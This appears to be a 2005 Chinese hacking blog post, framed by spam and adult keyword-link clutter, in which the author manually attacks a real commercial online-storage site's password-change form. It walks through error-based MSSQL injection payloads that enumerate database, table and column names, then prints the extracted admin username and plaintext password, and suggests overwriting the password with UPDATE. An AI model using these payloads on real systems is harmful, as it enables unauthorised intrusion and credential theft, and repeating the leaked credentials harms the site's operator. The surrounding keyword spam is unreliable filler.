国产一级一区二区_segui88久久综合9999_97久久夜色精品国产_欧美色网一区二区

掃一掃
關注微信公眾號

對一個大型網絡硬盤營業站點的測試
2005-12-17   

晚上,閑來無事,QQ群又吵死..無奈,于是對經常用的網絡硬盤的一個網站測試,現在的注入弱點都已經封得不能再封了,沒辦法,不過逛來逛去,來到了一個提交表單的面前"修改密碼"。
本次全為手動,沒有用任何工具.

 




在用戶名中加了一個',返回以下錯誤
Microsoft OLE DB Provider for ODBC Drivers 錯誤 '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]字符串 '' AND datediff(hour,ChangeTime,getdate())<=1 AND Succeed=0' 之前有未閉合的引號。
/service/changepass.asp,行 99
nnd,原來是asp+mssql,好,要玩就玩大的.
既然用戶名里可以輸入,其它三個框都沒有必要了,于是在本地搭建一個表單,maxlength="150" size="150",設得長一些,好可以輸入語句.

 



首先說明,在mssql數據庫中sysdatabase中是默認系統表,包含master、model、msdb、mssqlweb和empdb 5個數據庫的項,dbid從1到5是系統的,分別是以上5個項,如果用戶新建的話,那么dbid肯定從6開始,那么我們就試試暴出它玩玩.
在用戶輸入框中輸入:
' and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=6) and '1'='1
返回如下圖所值



好的,一個Northwind 庫名暴了出來,哎~~要的不是這個,下來依次提交dbid=7,報出了如下圖結果:



HOHO
這個是我所要的,因為我把dbid從6到8到試過了,后面都是返回了正常頁面,而且當dbid=7的時候,這里的庫名和網站的名稱是一樣的,所以確定為網站的庫名。 其中我已經把庫名屏蔽,以下用xxxxxxx來表示.............
既然得到了庫名,相應的就是要暴出他的表名。OK,依然往下提交。
' and 0<>(select top 1 name from xxxxxxx.dbo.sysobjects where xtype='U') and '1'='1
OK,結果暴出了如下圖



哎,得到Email_filts不是我要的,繼續提交
'and 0<>(select top 1 name from xxxxxxx.dbo.sysobjects where xtype='U' and name not in('Email_Filts')) and '1'='1
得到'ADDSize_LOG'
繼續提交
'and 0<>(select top 1 name from xxxxxxx.dbo.sysobjects where xtype='U' and name not in('Email_Filts','ADDSize_LOG')) and '1'='1
得到'admin',好了,得到他了,應該沒有錯,HOHO
得到admin這個表,下來就是要表中的值了.
在用戶名中提交:
'and 0<>(select count(*) from xxxxxxx.dbo.sysobjects where xtype='U' and name='admin' and uid>(str(id))) and '1'='1



如圖得到ID號:1653580929
哈哈,既然有了ID號,這下還不死??
現次提交:
'and 0<>(select top 1 name from xxxxxxx.dbo.syscolumns where id=1653580929) and '1'='1
暴出adminid,不是我要的,繼續:
'and 0<>(select top 1 name from xxxxxxx.dbo.syscolumns where id=1653580929 and name not in('adminid')) and '1'='1
暴出adminpass,繼續:
'and 0<>(select top 1 name from xxxxxxx.dbo.syscolumns where id=1653580929 and name not in('adminid','adminpass')) and '1'='1
暴出adminuser,再繼續:
'and 0<>(select top 1 name from xxxxxxx.dbo.syscolumns where id=1653580929 and name not in('adminid','adminpass','adminuser')) and '1'='1
呵呵,返回正常頁面,不用了,一口氣暴了3個值夠了.
這下有了adminuser和adminpass,是個人都知道是什么吧,這下我們要這2個字段的值.
用最精典的如:user>0來暴
在用戶名中輸入:
'and 0<>(select adminid from xxxxxxx.dbo.admin where adminuser>1) and '1'='1
如圖:



adminuser=liqianlong,啥也不說了
再輸入:
'and 0<>(select adminid from xxxxxxx.dbo.admin where adminuser='liqianlong' and adminpass>1) and '1'='1
如圖:



adminpass=laoziyanhuifeiyang
暈,密碼:老子煙灰飛揚????? 牛!!! 不說啥了,還不加密。如果加密了也沒關系,可以用updata來修寫他的密碼。
弄了半天,一看,網頁和數據庫不是一個服務器,我昏,玩完,iis記錄,ai....我的權限,不是讓我用同網段來.......#$#$#$#%$%&^%&
呵呵,這是給新手一個小小手工測試方法,關鍵在于靈活應用.


熱詞搜索:

上一篇:跨站式SQL注入技巧
下一篇:利用leadbbsCookie欺騙漏洞進行的入侵

分享到: 收藏
国产一级一区二区_segui88久久综合9999_97久久夜色精品国产_欧美色网一区二区
亚洲精选中文字幕| 欧美伊人久久久久久久久影院| 亚洲桃花岛网站| 国产精品一区二区久久久| 久久先锋资源| 亚洲一区二区视频在线观看| 红杏aⅴ成人免费视频| 欧美精品亚洲精品| 亚洲主播在线播放| 亚洲人体影院| 狠狠色噜噜狠狠色综合久| 国产精品成人免费视频| 免费亚洲电影在线观看| 欧美亚洲一区二区在线| 亚洲免费精品| 在线观看亚洲视频| 国产精品日韩欧美一区| 欧美精品在线网站| 久久另类ts人妖一区二区| 正在播放亚洲| 亚洲精选中文字幕| 韩日精品视频| 国产精品私人影院| 欧美日韩精品在线视频| 亚洲性夜色噜噜噜7777| 国产日韩精品视频一区二区三区| 免费在线国产精品| 免费观看成人网| 销魂美女一区二区三区视频在线| 亚洲欧洲精品一区二区三区| 国产专区综合网| 国产九九视频一区二区三区| 国产精品国产三级国产专区53| 欧美日韩 国产精品| 久久综合中文| 久久久久在线观看| 久久久久久噜噜噜久久久精品| 性18欧美另类| 午夜视频久久久| 一区二区三区精品| 欧美视频一区二区三区…| 蜜桃av一区二区| 欧美承认网站| 欧美久久精品午夜青青大伊人| 欧美激情第三页| 欧美日韩综合在线免费观看| 欧美三区美女| 国产精品你懂的在线| 欧美日本在线看| 免费观看一级特黄欧美大片| 欧美jizz19性欧美| 欧美日本成人| 国产精品亚洲产品| 国内精品久久久久久久影视蜜臀 | 红桃视频国产精品| 在线成人亚洲| 日韩一级大片在线| 午夜精品久久久久久久久久久久久| 午夜欧美精品| 性感少妇一区| 久久久久综合一区二区三区| 久久蜜臀精品av| 欧美精品91| 国产精品草草| 国产一区 二区 三区一级| 黄色成人av网站| 亚洲精品一线二线三线无人区| 一区二区电影免费在线观看| 日韩视频中文| 欧美怡红院视频| 欧美成年人网站| 国产精品成人免费| 激情综合电影网| 一本色道久久综合亚洲精品不| 亚洲欧美日韩中文在线制服| 欧美一区二区三区婷婷月色| 老色鬼精品视频在线观看播放| 欧美日韩视频在线观看一区二区三区| 国产精品一区二区你懂的| 亚洲国产高清一区二区三区| 亚洲一区视频在线| 久久久国产精品一区| 欧美va日韩va| 欧美色区777第一页| 欧美一区二区三区四区在线观看| 欧美天堂亚洲电影院在线播放| 免费在线看成人av| 国产一区视频在线观看免费| 一区二区三区欧美成人| 激情综合自拍| 亚洲久久在线| 美日韩精品视频免费看| 久久夜色精品国产噜噜av| 亚洲一区在线播放| 久久人人爽人人| 国产精品视频精品| 一区二区三区国产在线观看| 亚洲欧美日韩在线观看a三区 | 亚洲国产精品免费| 久久久免费av| 亚洲一区二区三区四区中文| 国产亚洲欧美色| 国产视频欧美视频| 欧美成年视频| 欧美一区二区三区精品电影| av成人激情| 亚洲国产精品女人久久久| 久久免费偷拍视频| 久久综合一区| 国产乱子伦一区二区三区国色天香 | 欧美成人免费在线| 国产亚洲福利一区| 亚洲人成毛片在线播放| 久久国产日韩| 国产欧美va欧美不卡在线| 在线视频精品一区| 欧美精品一区二区三区蜜桃| 亚洲国产视频一区| 久久久亚洲国产美女国产盗摄| 亚洲男人的天堂在线观看| 国产精品揄拍一区二区| 久久视频一区二区| 99精品视频免费在线观看| 国产精品爽黄69| 久久亚洲午夜电影| 99re这里只有精品6| 国产女主播在线一区二区| 免费日韩av| 亚洲欧美日韩国产成人精品影院| 黄色日韩网站| 欧美日韩色综合| 久久国产福利| 99视频精品全部免费在线| 国内精品视频666| 欧美日韩精品综合在线| 久久精品一区二区国产| 亚洲精品久久久久久一区二区 | 国产精品私房写真福利视频| 久久久综合精品| 亚洲综合久久久久| 亚洲国产视频a| 国产欧美日韩精品丝袜高跟鞋| 欧美暴力喷水在线| 午夜一区二区三视频在线观看 | 在线视频欧美日韩| 在线播放日韩| 国产欧美日韩视频一区二区三区| 欧美成年人在线观看| 欧美伊久线香蕉线新在线| 99精品久久久| 亚洲国产精品va在线看黑人| 国产欧美日韩专区发布| 欧美午夜视频在线| 欧美二区视频| 久久久青草婷婷精品综合日韩| 亚洲欧美日韩在线不卡| 亚洲最新在线视频| 亚洲高清网站| 国产在线欧美日韩| 国产精品一区一区| 欧美午夜宅男影院在线观看| 欧美电影免费观看高清完整版| 久久久久久综合网天天| 欧美一区二视频在线免费观看| 一区二区三区视频在线观看| 亚洲精品韩国| 亚洲精品你懂的| 亚洲激情网站| 亚洲欧洲日本在线| 亚洲欧洲精品天堂一级| 亚洲国产日韩欧美| 亚洲国产女人aaa毛片在线| 亚洲大片在线| 亚洲高清视频在线| 91久久精品久久国产性色也91| 亚洲福利视频一区二区| 亚洲国产片色| 亚洲精品一区二区三区四区高清 | 国产美女精品免费电影| 欧美一区二区视频97| 日韩一级片网址| 欧美日韩国产一区精品一区| 亚洲欧美日韩成人高清在线一区| 亚洲精品一二区| 亚洲人成网站影音先锋播放| 尤妮丝一区二区裸体视频| 精品999成人| 狠狠色伊人亚洲综合网站色| 国内精品久久久久久久97牛牛| 国产主播一区二区| 在线观看国产精品网站| 亚洲国产婷婷香蕉久久久久久99 | 亚洲夜间福利| 亚洲图中文字幕| 亚洲男人第一av网站| 午夜精品在线| 久久久精品欧美丰满| 欧美顶级艳妇交换群宴| 欧美午夜www高清视频| 国产精品一区免费视频|